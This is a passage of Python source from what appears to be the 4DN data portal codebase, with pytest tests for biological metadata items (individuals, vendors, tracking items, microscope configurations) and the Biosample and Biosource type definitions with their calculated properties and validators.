mouse_child['individual_relation'] = [{'relationship_type': 'derived from', 'individual': human_individual['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=422)
errors = res.json['errors']
assert errors[0]['name'] == 'Individual relation: different species'
def test_validate_individual_relation_valid_patch(testapp, award, lab, mouse_child,
mouse_individual, mouse_individual_2):
res = testapp.post_json('/individual_mouse', mouse_child, status=201)
assert not res.json.get('errors')
patch_body = {
'individual_relation': [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from', 'individual': mouse_individual_2['@id']}
]
}
res2 = testapp.patch_json(res.json['@graph'][0]['@id'], patch_body, status=200)
assert not res2.json.get('errors')
def test_validate_individual_relation_valid_patch_contains_uuid(testapp, award, lab, mouse_child,
mouse_individual, mouse_individual_2):
child_mouse = testapp.post_json('/individual_mouse', mouse_child, status=201).json['@graph'][0]
patch_body = {
'uuid': child_mouse.get('uuid'),
'individual_relation': [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from', 'individual': mouse_individual_2['@id']}
]
}
res2 = testapp.patch_json(child_mouse['@id'], patch_body, status=200)
assert not res2.json.get('errors')
def test_validate_individual_relation_self(testapp, award, lab, mouse_child):
res = testapp.post_json('/individual_mouse', mouse_child, status=201)
assert not res.json.get('errors')
patch_body = [{'relationship_type': 'derived from', 'individual': res.json['@graph'][0]['@id']}]
res2 = testapp.patch_json(res.json['@graph'][0]['@id'], {'individual_relation': patch_body}, status=422)
errors = res2.json['errors']
assert errors[0]['name'] == 'Individual relation: self-relation'
def test_validate_individual_relation_same(testapp, award, lab, mouse_individual, mouse_individual_2, mouse_child):
mouse_child['individual_relation'] = [
{'relationship_type': 'derived from (maternal strain)', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from (maternal strain)', 'individual': mouse_individual_2['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=422)
errors = res.json['errors']
assert errors[0]['name'] == 'Individual relation: too many of the same type'
def test_validate_individual_relation_duplicate(testapp, award, lab, mouse_individual, mouse_child):
mouse_child['individual_relation'] = [
{'relationship_type': 'derived from', 'individual': mouse_individual['@id']},
{'relationship_type': 'derived from (maternal strain)', 'individual': mouse_individual['@id']}]
res = testapp.post_json('/individual_mouse', mouse_child, status=422)
errors = res.json['errors']
assert errors[0]['name'] == 'Individual relation: multiple relations with same parent'
```
#### File: encoded/tests/test_types_init_collections.py
```python
import pytest
from ..types.image import Image
from ..util import utc_today_str
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def genomic_region_w_onlyendloc(testapp, lab, award):
item = {
"genome_assembly": "dm6",
"end_coordinate": 3,
'award': award['@id'],
'lab': lab['@id']
}
return testapp.post_json('/genomic_region', item).json['@graph'][0]
@pytest.fixture
def dt4genomic_regions(genomic_region_w_onlyendloc, some_genomic_region, basic_genomic_region,
vague_genomic_region, vague_genomic_region_w_desc):
return {
'dm6': genomic_region_w_onlyendloc,
'GRCh38:1:17-544': some_genomic_region,
'GRCh38': basic_genomic_region,
'GRCm38:5': vague_genomic_region,
'gene X enhancer': vague_genomic_region_w_desc
}
@pytest.fixture
def targets(target_w_desc, target_w_region, target_w_genes):
return {'target_w_desc': target_w_desc,
'target_w_region': target_w_region,
'target_w_genes': target_w_genes
}
@pytest.mark.skip # targets are not used
def test_calculated_target_summaries(testapp, targets):
for name in targets:
summary = targets[name]['target_summary']
if name == 'target_w_genes':
assert summary == 'Gene:eeny,meeny'
if name == 'target_w_regions' in targets:
assert summary == 'GRCh38:X:1-3'
if name == 'target_w_desc':
assert summary == 'no target'
def test_document_display_title_w_attachment(testapp, protocol_data, attachment):
protocol_data['attachment'] = attachment
del(protocol_data['protocol_type'])
res = testapp.post_json('/document', protocol_data).json['@graph'][0]
assert res.get('display_title') == 'red-dot.png'
def test_document_display_title_wo_attachment(testapp, protocol_data):
del(protocol_data['protocol_type'])
res = testapp.post_json('/document', protocol_data).json['@graph'][0]
assert res.get('display_title') == 'Document from ' + utc_today_str()
def test_organism_display_title_standard_scientific_name(testapp, human_data):
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'H. sapiens'
def test_organism_display_title_three_part_scientific_name(testapp, human_data):
human_data['scientific_name'] = 'Drosophila pseudoobscura pseudoobscura'
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'D. pseudoobscura pseudoobscura'
def test_organism_display_title_one_part_scientific_name(testapp, human_data):
human_data['scientific_name'] = 'george'
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'george'
def test_organism_display_title_no_scientific_name(testapp, human_data):
del(human_data['scientific_name'])
res = testapp.post_json('/organism', human_data).json['@graph'][0]
assert res.get('display_title') == 'human'
@pytest.fixture
def google_analytics_tracking_data():
return {
"status": "released",
"tracking_type": "google_analytics",
"google_analytics": {
"reports": {
"views_by_experiment_set": [
{
"ga:productCategoryLevel2": "ExperimentSetReplicate",
"ga:productName": "4DNESKSPBI9A",
"ga:productListClicks": 1,
"ga:productListViews": 21,
"ga:productSku": "4DNESKSPBI9A",
"ga:productDetailViews": 4,
"ga:productBrand": "Chuck Murry, UW"
}
],
"fields_faceted": [
{
"ga:users": 12,
"ga:totalEvents": 19,
"ga:sessions": 13,
"ga:dimension3": "experiments_in_set.experiment_type.display_title"
},
{
"ga:users": 13,
"ga:totalEvents": 16,
"ga:sessions": 15,
"ga:dimension3": "experiments_in_set.biosample.biosource.individual.organism.name"
}
],
"views_by_file": [
{
"ga:productCategoryLevel2": "FileProcessed",
"ga:productName": "4DNFIC2XS1Y3.mcool",
"ga:productListClicks": 0,
"ga:productListViews": 0,
"ga:productSku": "4DNFIC2XS1Y3",
"ga:productDetailViews": 1,
"ga:productBrand": "Erez Lieberman Aiden, BCM"
}
]
},
"for_date": "2019-05-09",
"date_increment": "daily"}
}
@pytest.fixture
def google_analytics(testapp, google_analytics_tracking_data):
return testapp.post_json('/tracking_item', google_analytics_tracking_data).json['@graph'][0]
@pytest.fixture
def download_tracking_item_data():
return {
"status": "released",
"tracking_type": "download_tracking",
"download_tracking": {
"geo_country": "NL",
"geo_city": "Utrecht, Provincie Utrecht",
"request_path": "/files-processed/4DNFI6BTR1IC/@@download/4DNFI6BTR1IC.pairs.gz.px2",
"user_uuid": "anonymous",
"user_agent": "Wget/1.17.1 (linux-gnu)",
"remote_ip": "172.16.17.32",
"file_format": "pairs_px2",
"filename": "4DNFI6BTR1IC.pairs.gz.px2",
"experiment_type": "in situ Hi-C"
}
}
@pytest.fixture
def download_tracking(testapp, download_tracking_item_data):
return testapp.post_json('/tracking_item', download_tracking_item_data).json['@graph'][0]
@pytest.fixture
def jupyterhub_session_tracking_data():
return {
"status": "in review by lab",
"tracking_type": "jupyterhub_session",
"jupyterhub_session": {
"date_initialized": "2019-05-09T05:11:56.389876+00:00",
"date_culled": "2019-05-09T06:21:54.726782+00:00",
"user_uuid": "e0beacd7-225f-4fa8-81fb-a1856603e204"
},
"uuid": "ff4575d4-67b4-458f-8b1c-b3fcb3690ce9",
}
@pytest.fixture
def jupyterhub_session(testapp, jupyterhub_session_tracking_data):
return testapp.post_json('/tracking_item', jupyterhub_session_tracking_data).json['@graph'][0]
def test_tracking_item_display_title_google_analytic(google_analytics):
assert google_analytics.get('display_title') == 'Google Analytics for 2019-05-09'
def test_tracking_item_display_title_download(download_tracking):
assert download_tracking.get('display_title') == 'Download Tracking Item from ' + utc_today_str()
def test_tracking_item_display_title_other(jupyterhub_session):
assert jupyterhub_session.get('display_title') == 'Tracking Item from ' + utc_today_str()
@pytest.fixture
def vendor_data(lab, award):
return {"title": "WorTHington Biochemical", 'lab': lab['@id'], 'award': award['@id']}
def test_vendor_update_name_no_caps(testapp, vendor_data):
res = testapp.post_json('/vendor', vendor_data, status=201)
assert res.json['@graph'][0]['name'] == "worthington-biochemical"
def test_vendor_update_name_no_punctuation_or_space(testapp, vendor_data):
vendor_data['title'] = "Eeny, = Meeny! # -miny?"
res = testapp.post_json('/vendor', vendor_data, status=201)
assert res.json['@graph'][0]['name'] == "eeny-meeny-miny"
def test_vendor_name_updates_on_patch(testapp, vendor_data):
res = testapp.post_json('/vendor', vendor_data, status=201)
assert res.json['@graph'][0]['name'] == "worthington-biochemical"
res = testapp.patch_json(res.json['@graph'][0]['@id'], {'title': 'WaHoo'}, status=200)
assert res.json['@graph'][0]['name'] == "wahoo"
@pytest.fixture
def vendor_data_alias(lab, award):
return {
'title': 'Wrong Alias Biochemical',
'lab': lab['@id'],
'award': award['@id'],
'aliases': ['my_lab:this_is_correct_one',
'my_lab:this/is_wrong',
'my_lab:this\is_wrong_too']}
def test_vendor_alias_wrong_format(testapp, vendor_data_alias):
res = testapp.post_json('/vendor', vendor_data_alias, status=422)
response = res.json
print(res.json)
assert response['status'] == 'error'
assert response['code'] == 422
problematic_aliases = 0
for an_error in response['errors']:
if an_error['name'].startswith('Schema: aliases'):
problematic_aliases += 1
assert problematic_aliases == 2
def test_genomic_region_display_title(testapp, dt4genomic_regions):
for dt, region in dt4genomic_regions.items():
assert region.get('display_title') == dt
def test_image_unique_key(registry, image_data):
uuid = "0afb6080-1c08-11e4-8c21-0800200c9a44"
image = Image.create(registry, uuid, image_data)
keys = image.unique_keys(image.properties)
assert 'red-dot.png' in keys['image:filename']
```
#### File: encoded/tests/test_types_microscope_configuration.py
```python
import pytest
from ..schema_formats import is_uuid
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def tier1_microscope_configuration(testapp):
item = {
'uuid': 'e700e61c-9da5-465f-9b4f-189852897df5',
'microscope': {
'Tier': 1,
'ValidationTier': 1,
'Name': '<NAME>.'
}
}
return testapp.post_json('/microscope-configurations', item).json['@graph'][0]
def test_get_tier1_microscope(testapp, tier1_microscope_configuration):
assert tier1_microscope_configuration['microscope']['Tier'] == 1
assert tier1_microscope_configuration['microscope']['ValidationTier'] == 1
assert is_uuid(tier1_microscope_configuration['microscope']['ID'])
def test_tier1_microscope_display_title(testapp, tier1_microscope_configuration):
assert tier1_microscope_configuration['display_title'] == 'Test Mic. Conf.'
tier1_microscope_configuration['microscope']['Name'] = 'Test Mic. Conf. Updated'
res = testapp.patch_json(tier1_microscope_configuration['@id'], {
'microscope': tier1_microscope_configuration['microscope']}, status=200)
assert res.json['@graph'][0].get(
'display_title') == 'Test Mic. Conf. Updated'
```
#### File: encoded/tests/test_types_tracking_item.py
```python
import pytest
# Code that uses this is commented-out below.
# from ..types import TrackingItem
pytestmark = [pytest.mark.setone, pytest.mark.working, pytest.mark.schema]
@pytest.fixture
def tracking_item():
return {"tracking_type": "other", "other_tracking": {"extra_field": "extra_value"}}
def test_insert_and_get_tracking_item(testapp, tracking_item):
res = testapp.post_json('/tracking-items', tracking_item, status=201)
assert res.json['@graph'][0]['tracking_type'] == tracking_item['tracking_type']
res_uuid = res.json['@graph'][0]['uuid']
get_res = testapp.get('/tracking-items/' + res_uuid).follow()
assert get_res.json['other_tracking']['extra_field'] == tracking_item['other_tracking']['extra_field']
assert get_res.json.get('date_created')
# def test_tracking_item_create_and_commit(testapp, dummy_request):
# test_body = {
# "tracking_type": "other",
# "other_tracking": {"key1": "val1"},
# "submitted_by": "<EMAIL>"
# }
# res = TrackingItem.create_and_commit(dummy_request, test_body)
# assert res['status'] == 'success'
# res_path = res['@graph'][0]
# app_res = testapp.get(res_path)
# assert app_res.json['tracking_type'] == test_body['tracking_type']
# assert app_res.json['other_tracking']['key1'] == test_body['other_tracking']['key1']
# # should not have date created in this case (no validators run)
# assert 'date_created' not in app_res.json
# # however status is added automatically when using create_and_commit fxn
# assert app_res.json['status'] == 'in review by lab'
```
#### File: encoded/tests/test_upgrade_ontology_term.py
```python
import pytest
pytestmark = [pytest.mark.setone, pytest.mark.working]
@pytest.fixture
def ontology_term_1(so_ont, award, lab):
return{
"schema_version": '1',
"term_id": 'SO:0001111',
"term_name": 'so_term',
"source_ontology": so_ont['@id']
}
def test_ontology_term_1_2(
app, ontology_term_1, so_ont):
migrator = app.registry['upgrader']
value = migrator.upgrade('ontology_term', ontology_term_1, current_version='1', target_version='2')
assert value['schema_version'] == '2'
assert value['source_ontologies'][0] == so_ont['@id']
```
#### File: encoded/types/biosample.py
```python
from snovault import (
calculated_property,
collection,
load_schema,
)
from .base import (
Item,
lab_award_attribution_embed_list,
get_item_or_none
)
from .dependencies import DependencyEmbedder
def _build_biosample_embedded_list():
""" Helper function intended to be used to create the embedded list for biosample.
All types should implement a function like this going forward.
"""
modification_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications',
t='modification')
mod_bio_feature_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications.target_of_mod',
t='bio_feature')
treatments_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='treatments',
t='treatment')
biosource_cell_line_embeds = DependencyEmbedder.embed_for_type(base_path='biosource.cell_line',
t='ontology_term',
additional_embeds=['synonyms'])
biosource_tissue_embeds = DependencyEmbedder.embed_for_type(base_path='biosource.tissue',
t='ontology_term',
additional_embeds=['synonyms'])
biosource_tissue_slim_embeds = DependencyEmbedder.embed_for_type(base_path='biosource.tissue.slim_terms',
t='ontology_term',
additional_embeds=['synonyms'])
cell_culture_details_embeds = DependencyEmbedder.embed_for_type(base_path='cell_culture_details.tissue',
t='ontology_term',
additional_embeds=['synonyms'])
cell_culture_details_tissue_embeds = DependencyEmbedder.embed_for_type(
base_path='cell_culture_details.tissue.slim_terms',
t='ontology_term',
additional_embeds=['synonyms'])
biosample_protocols_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='biosample_protocols',
t='protocol')
return (
Item.embedded_list + lab_award_attribution_embed_list + modification_embeds + mod_bio_feature_embeds
+ treatments_embeds + biosource_cell_line_embeds + biosource_tissue_embeds + biosource_tissue_slim_embeds
+ cell_culture_details_embeds + cell_culture_details_tissue_embeds + biosample_protocols_embeds + [
# Badge linkTo
'badges.badge.title',
'badges.badge.commendation',
'badges.badge.warning',
'badges.badge.badge_classification',
'badges.badge.description',
'badges.badge.badge_icon',
'badges.messages',
# Biosource linkTo - many calc prop dependencies
'biosource.*',
'biosource.individual.sex',
'biosource.individual.organism.name',
'biosource.biosource_vendor.name', # display_title uses this
# BiosampleCellCulture linkTo + Image linkTo
'cell_culture_details.*',
'cell_culture_details.morphology_image.caption',
'cell_culture_details.morphology_image.attachment.href',
'cell_culture_details.morphology_image.attachment.type',
'cell_culture_details.morphology_image.attachment.md5sum',
'cell_culture_details.morphology_image.attachment.download',
'cell_culture_details.morphology_image.attachment.width',
'cell_culture_details.morphology_image.attachment.height',
# Construct linkTo
'treatments.constructs.name',
]
)
@collection(
name='biosamples',
unique_key='accession',
properties={
'title': 'Biosamples',
'description': 'Biosamples used in the 4DN project',
})
class Biosample(Item): # CalculatedBiosampleSlims, CalculatedBiosampleSynonyms):
"""Biosample class."""
item_type = 'biosample'
schema = load_schema('encoded:schemas/biosample.json')
# name_key = 'accession'
aggregated_items = {
"badges": [
"messages",
"badge.commendation",
"badge.warning",
"badge.uuid",
"badge.@id",
"badge.badge_icon",
"badge.description"
]
}
embedded_list = _build_biosample_embedded_list()
name_key = 'accession'
@calculated_property(schema={
"title": "Modifications summary",
"description": "Summary of any modifications on the biosample.",
"type": "string",
})
def modifications_summary(self, request, modifications=None):
""" Requires modifications.modification_name (display_title embeds) """
if modifications:
ret_str = ''
for mod in modifications:
mod_props = get_item_or_none(request, mod, 'modifications')
if mod_props and mod_props.get('modification_name'):
ret_str += (mod_props['modification_name'] + ' and ')
if len(ret_str) > 0:
return ret_str[:-5]
else:
return 'None'
return 'None'
@calculated_property(schema={
"title": "Modifications summary short",
"description": "Shorter summary of any modifications on the biosample for tables.",
"type": "string",
})
def modifications_summary_short(self, request, modifications=None):
if modifications:
# use only the first modification
mod_props = get_item_or_none(request, modifications[0], 'modifications')
if mod_props and mod_props.get('modification_name_short'):
return mod_props['modification_name_short']
return 'None'
@calculated_property(schema={
"title": "Treatment summary",
"description": "Summary of treatments on the biosample.",
"type": "string",
})
def treatments_summary(self, request, treatments=None):
""" Just relies on display title, which should be properly embedded. """
if treatments:
treat_list = []
for tmt in treatments:
treat_props = get_item_or_none(request, tmt, 'treatments')
treat_list.append(treat_props.get('display_title'))
return ' and '.join([t for t in treat_list if t])
return 'None'
@calculated_property(schema={
"title": "Tissue, Organ/System Info",
"description": "Useful faceting info for biosample",
"type": "object",
"properties": {
"tissue_source": {
"type": "string"
},
"organ_system": {
"type": "array",
"items": {
"type": "string"
}
},
}
})
def tissue_organ_info(self, request, biosource, cell_culture_details=None):
""" For efficiency and practicality we first check to see if there are cell culture details
and if there are (only checking the first one as the differentiation state should be the same on all)
does it have 'tissue' term? If so use it to populate property and if not then check the biosource(s)
and if there are more than one (no cases so far) see if there is tissue and if so if different call mixed
"""
# NOTE: 2020-10-20 although it is possible for there to be both multiple biosources and cell_culture_details
# in one biosample - there are no cases and are unlikely to be in the future but if there ever were there
# would potentially be some imprecision in the prop values for that case
sample_info = {}
tissue = None
organ = []
if cell_culture_details: # this is a list but for ccd only take first as all should be same tissue if there
cell_culture_details = _get_item_info(request, [cell_culture_details[0]], 'cell_culture_details')[0]
if cell_culture_details and 'tissue' in cell_culture_details:
tissue, organ = _get_sample_tissue_organ(request, cell_culture_details.get('tissue'))
if not tissue: # ccd was absent or had no tissue info so check the biosource
biosource = _get_item_info(request, biosource, 'biosources')
tissue_terms = set()
for bios in biosource:
# generally only one but account for edge case of multiple with different tissue
if 'tissue' in bios:
tissue_terms.add(bios.get('tissue'))
if not tissue_terms:
return None # no tissue found
elif len(tissue_terms) == 1: # we have a single tissue (usual case)
(tterm, ) = tissue_terms
tissue, organ = _get_sample_tissue_organ(request, tterm)
else: # edge case of more than one tissue mark it as mixed but return all the relevant slims
for term in tissue_terms:
_, organs = _get_sample_tissue_organ(request, term)
organ.extend(organs)
organ = list(set([o for o in organ if o]))
tissue = 'mixed tissue'
# put info in right place and return it
if tissue:
sample_info['tissue_source'] = tissue
if organ:
sample_info['organ_system'] = organ
if sample_info:
return sample_info
return None
@calculated_property(schema={
"title": "Biosource summary",
"description": "Summary of any biosources comprising the biosample.",
"type": "string",
})
def biosource_summary(self, request, biosource, cell_culture_details=None):
""" XXX: This field, if embedded, needs embeds adjusted. """
ret_str = ''
for bios in biosource:
bios_props = get_item_or_none(request, bios, 'biosources')
if bios_props and bios_props.get('biosource_name'):
ret_str += (bios_props['biosource_name'] + ' and ')
if len(ret_str) > 0:
ret_str = ret_str[:-5]
if cell_culture_details: # will assume same differentiation if multiple bccs
cc_props = get_item_or_none(request, cell_culture_details[0], 'biosample_cell_cultures', frame='embedded')
if (cc_props and 'tissue' in cc_props and
cc_props.get('in_vitro_differentiated') == 'Yes'):
ret_str = ret_str + ' differentiated to ' + cc_props['tissue'].get('display_title')
return ret_str
return 'None' # pragma: no cover
@calculated_property(schema={
"title": "Sample type",
"description": "The type of biosample used in an experiment.",
"type": "string",
})
def biosample_type(self, request, biosource, cell_culture_details=None):
biosource_types = []
for bs in biosource:
# silliness in case we ever have multiple biosources
biosource = get_item_or_none(request, bs, 'biosources')
if biosource:
btype = biosource.get('biosource_type')
biosource_types.append(btype)
biosource_types = list(set(biosource_types))
if len(biosource_types) > 1:
# hopefully rare or never happen
return 'mixed sample'
elif len(biosource_types) < 1: # pragma: no cover
# shouldn't happen so raise an exception
raise Exception("Biosource has no types: %s" % biosource_types)
# we've got a single type of biosource
if cell_culture_details: # this is now an array but just check the first
cell_culture = get_item_or_none(request, cell_culture_details[0], 'biosample_cell_cultures')
if cell_culture:
if cell_culture.get('in_vitro_differentiated') == 'Yes':
return 'in vitro differentiated cells'
biosource_type = biosource_types[0]
if biosource_type == 'multicellular organism':
biosource_type = 'whole organism'
elif biosource_type == 'stem cell derived cell line':
biosource_type = 'stem cell'
elif biosource_type.endswith(' line'):
biosource_type = biosource_type[:-5]
if biosource_type == 'tissue':
return biosource_type
return biosource_type + 's'
@calculated_property(schema={
"title": "Sample Category",
"description": "The category of biosample used in an experiment.",
"type": "string",
})
def biosample_category(self, request, biosource, cell_culture_details=None):
if len(biosource) > 1:
return ['Mixed samples']
categories = []
biosource = get_item_or_none(request, biosource[0], 'biosources')
if biosource:
categories = biosource.get('biosource_category', [])
if cell_culture_details: # this is now an array but just check the first
cell_culture = get_item_or_none(request, cell_culture_details[0], 'biosample_cell_cultures')
if cell_culture:
if cell_culture.get('in_vitro_differentiated') == 'Yes':
categories.append('In vitro Differentiation')
return [c for c in categories if 'stem cell' not in c]
if categories:
return categories
def _update(self, properties, sheets=None):
# update self first to ensure 'biosample_relation' are stored in self.properties
super(Biosample, self)._update(properties, sheets)
DicRefRelation = {
"derived from": "parent of",
"parent of": "derived from"
}
acc = str(self.uuid)
if 'biosample_relation' in properties.keys():
for relation in properties["biosample_relation"]:
switch = relation["relationship_type"]
rev_switch = DicRefRelation[switch]
related_bs = relation["biosample"]
relationship_entry = {"relationship_type": rev_switch, "biosample": acc}
rel_dic = {'biosample_relation': [relationship_entry, ]}
target_bs = self.collection.get(related_bs)
# case one we don't have relations
if 'biosample_relation' not in target_bs.properties.keys():
target_bs.properties.update(rel_dic)
target_bs.update(target_bs.properties)
else:
# case two we have relations but not the one we need
for target_relation in target_bs.properties['biosample_relation']:
if target_relation['biosample'] == acc:
break
else:
# make data for new biosample_relation
target_bs.properties['biosample_relation'].append(relationship_entry)
target_bs.update(target_bs.properties)
def _get_sample_tissue_organ(request, tissue_id):
""" Helper function used in the tissue_organ_info calculated_property
"""
tissue = None
organ_system = []
tissue_term = _get_item_info(request, [tissue_id], 'ontology_terms')[0] # 1 item list
if tissue_term:
tissue = tissue_term.get('display_title')
if 'slim_terms' in tissue_term:
slim_terms = _get_item_info(request, tissue_term.get('slim_terms'), 'ontology_terms')
for st in slim_terms:
if st.get('is_slim_for') in ['developmental', 'system', 'organ']:
organ_system.append(st.get('display_title'))
return tissue, organ_system
def _get_item_info(request, item, itype):
""" Helper function used in the tissue_organ_info calculated_property
Getting object representation of Items which may be passed as a list
may have more than one associated Item
"""
items = []
for it in item:
items.append(get_item_or_none(request, it, itype))
# don't want any None values
return [i for i in items if i]
@calculated_property(context=Biosample, category='action')
def clone(context, request):
"""If the user submits for any lab, allow them to clone
This is like creating, but keeps previous fields"""
if request.has_permission('create'):
return {
'name': 'clone',
'title': 'Clone',
'profile': '/profiles/{ti.name}.json'.format(ti=context.type_info),
'href': '{item_uri}#!clone'.format(item_uri=request.resource_path(context)),
}
```
#### File: encoded/types/biosource.py
```python
from snovault import (
calculated_property,
collection,
load_schema,
)
from snovault.validators import (
validate_item_content_post,
validate_item_content_put,
validate_item_content_patch,
validate_item_content_in_place,
no_validate_item_content_post,
no_validate_item_content_put,
no_validate_item_content_patch
)
from snovault.crud_views import (
collection_add,
item_edit,
)
from snovault.util import debug_log
from pyramid.view import view_config
from .base import (
Item,
get_item_or_none,
lab_award_attribution_embed_list
)
from .dependencies import DependencyEmbedder
def _build_biosource_embedded_list():
""" Helper function intended to be used to create the embedded list for biosource.
All types should implement a function like this going forward.
"""
modification_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications', t='modification')
modification_target_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='modifications.target_of_mod',
t='bio_feature')
tissue_embeds = DependencyEmbedder.embed_for_type(base_path='tissue', t='ontology_term',
additional_embeds=['synonyms'])
tissue_slim_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='tissue.slim_terms', t='ontology_term')
cell_line_embeds = DependencyEmbedder.embed_for_type(base_path='cell_line', t='ontology_term',
additional_embeds=['synonyms'])
cell_line_slim_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='cell_line.slim_terms',
t='ontology_term')
sop_embeds = DependencyEmbedder.embed_defaults_for_type(base_path='SOP_cell_line', t='protocol')
return (
Item.embedded_list + lab_award_attribution_embed_list + modification_embeds + modification_target_embeds +
tissue_embeds + tissue_slim_embeds + cell_line_embeds + cell_line_slim_embeds + sop_embeds + [
# Individual linkTo
'individual.accession',
'individual.age',
'individual.age_units',
'individual.sex',
'individual.life_stage',
'individual.mouse_life_stage',
'individual.mouse_strain',
'individual.ethnicity',
'individual.health_status',
# Organism linkTo
'individual.organism.name',
'individual.organism.scientific_name',
# Ontology linkTo
'tissue.source_ontologies.ontology_name',
]
)
@collection(
name='biosources',
unique_key='accession',
properties={
'title': 'Biosources',
'description': 'Cell lines and tissues used for biosamples',
})
class Biosource(Item):
"""Biosource class."""
item_type = 'biosource'
name_key = 'accession'
schema = load_schema('encoded:schemas/biosource.json')
embedded_list = _build_biosource_embedded_list()
@calculated_property(schema={
"title": "Biosource name",
"description": "Specific name of the biosource.",
"type": "string",
})
def biosource_name(self, request, biosource_type, individual=None,
cell_line=None, cell_line_tier=None, tissue=None,
modifications=None, override_biosource_name=None):
if override_biosource_name:
# if this field is present just return it
return override_biosource_name
cell_line_types = [
'primary cell',
'primary cell line',
'immortalized cell line',
'stem cell',
'induced pluripotent stem cell',
'stem cell derived cell line',
]
mod_str = ''
if modifications:
mod_str = ' with ' + ', '.join([get_item_or_none(request, mod, 'modifications').get('modification_name_short', '')
for mod in modifications])
# elif modifications and len(modifications) > 1:
# mod_str = ' with genetic modifications'
if biosource_type == "tissue":
if tissue:
tissue_props = get_item_or_none(request, tissue, 'ontology_terms')
if tissue_props:
return tissue_props.get('preferred_name') + mod_str
else:
return biosource_type + mod_str
elif biosource_type in cell_line_types:
if cell_line:
cell_line_props = get_item_or_none(request, cell_line, 'ontology_terms')
if cell_line_props:
cell_line_name = cell_line_props.get('preferred_name')
if cell_line_tier:
if cell_line_tier != 'Unclassified':
return cell_line_name + ' (' + cell_line_tier + ')' + mod_str
return cell_line_name + mod_str
return biosource_type + mod_str
elif biosource_type == "multicellular organism":
if individual:
organism_name = 'Unknown'
individual_props = get_item_or_none(request, individual, 'individuals')
if individual_props:
organism = individual_props.get('organism')
organism_props = get_item_or_none(request, organism, 'organisms')
if organism_props:
organism_name = organism_props['name']
return "whole " + organism_name + mod_str
return biosource_type + mod_str
@calculated_property(schema={
"title": "Biosource categories",
"description": "Categories for the biosource.",
"type": "array",
"items": {
"title": "Category",
"type": "string"
}
})
def biosource_category(self, request, biosource_type, individual=None,
cell_line=None, cell_line_tier=None, tissue=None,
modifications=None):
oterms = self.registry['collections']['OntologyTerm']
tid2cat = {
'EFO:0003042': 'H1-hESC',
'EFO:0002784': 'GM12878',
'4DN:0000014': 'HFF (c6 or hTERT)',
'EFO:0009318': 'HFF (c6 or hTERT)',
'4DN:0000001': 'HFF (c6 or hTERT)',
'4DN:0000005': 'WTC-11',
'EFO:0009747': 'WTC-11',
'EFO:0001196': 'IMR-90',
'4DN:0000260': 'Tier 2',
'4DN:0000250': 'Tier 2',
'EFO:0002824': 'Tier 2',
'4DN:0000003': 'Tier 2',
'EFO:0007598': 'Tier 2',
'EFO:0002067': 'Tier 2',
'EFO:0003045': 'Tier 2',
'EFO:0002869': 'Tier 2',
'EFO:0001182': 'Tier 2',
'4DN:0000004': 'Tier 2',
'4DN:0000002': 'Tier 2',
'4DN:0000262': 'Tier 2',
'EFO:0009319': 'Tier 2'
}
category = []
tiered_line_cat = {}
for tid, cat in tid2cat.items():
oterm = oterms.get(tid)
if oterm:
tiered_line_cat[str(oterm.uuid)] = cat
# import pdb; pdb.set_trace()
if cell_line:
cl_term = get_item_or_none(request, cell_line, 'ontology-terms')
cluid = cl_term.get('uuid')
if cluid and cluid in tiered_line_cat:
category.append(tiered_line_cat[cluid])
if biosource_type in ['stem cell', 'induced pluripotent stem cell',
'stem cell derived cell line']:
ind = get_item_or_none(request, individual, 'individuals')
try:
ind_at_type = ind.get('@type', [])
except AttributeError:
ind_at_type = []
for at in ind_at_type:
if 'Human' in at:
category.append('Human stem cell')
elif 'Mouse' in at:
category.append('Mouse stem cell')
elif biosource_type == 'primary cell':
category.append('Primary Cells')
elif biosource_type in ['tissue', 'multicellular organism']:
category.append('Multicellular Tissue')
if tissue:
tis_term = get_item_or_none(request, tissue, 'ontology-terms')
# case for 1000 genomes/Hap Map
if tis_term.get('preferred_name') == 'B-lymphocyte':
if cl_term:
cl_name = cl_term.get('term_name')
if cl_name.startswith('GM') or cl_name.startswith('HG'):
category.append('1000 genomes/Hap Map')
if not category:
category.append('Other')
return category
@calculated_property(schema={
"title": "Display Title",
"description": "A calculated title for every object in 4DN",
"type": "string"
})
def display_title(self, request, biosource_type, individual=None,
cell_line=None, cell_line_tier=None, tissue=None, modifications=None, override_biosource_name=None):
return self.add_accession_to_title(self.biosource_name(request, biosource_type, individual, cell_line,
cell_line_tier, tissue, modifications, override_biosource_name))
class Collection(Item.Collection):
pass
# # validator for tissue field
def validate_biosource_tissue(context, request):
data = request.json
if 'tissue' not in data:
return
term_ok = False
tissue = data['tissue']
ontology_name = None
try:
termuid = get_item_or_none(request, tissue, 'ontology-terms').get('uuid')
try:
# checking to see if our context is a collection or an item to set get
context.get('blah')
getter = context
except AttributeError:
getter = context.collection
term = getter.get(termuid)
ontologies = term.upgrade_properties()['source_ontologies']
except AttributeError:
pass
request.validated.update({})
for o in ontologies:
oname = get_item_or_none(request, o, 'ontologys').get('ontology_name')
if oname in ['Uberon', '4DN Controlled Vocabulary']:
term_ok = True
break
if not term_ok:
try:
tissuename = tissue.get('term_name')
except AttributeError:
tissuename = str(tissue)
request.errors.add('body', 'Biosource: invalid tissue term', 'Term: ' + tissuename + ' is not found in UBERON')
else:
request.validated.update({})
# validator for cell_line field
def validate_biosource_cell_line(context, request):
data = request.json
if 'cell_line' not in data:
return
term_ok = False
cell_line = data['cell_line']
try:
# checking to see if our context is a collection or an item to set get
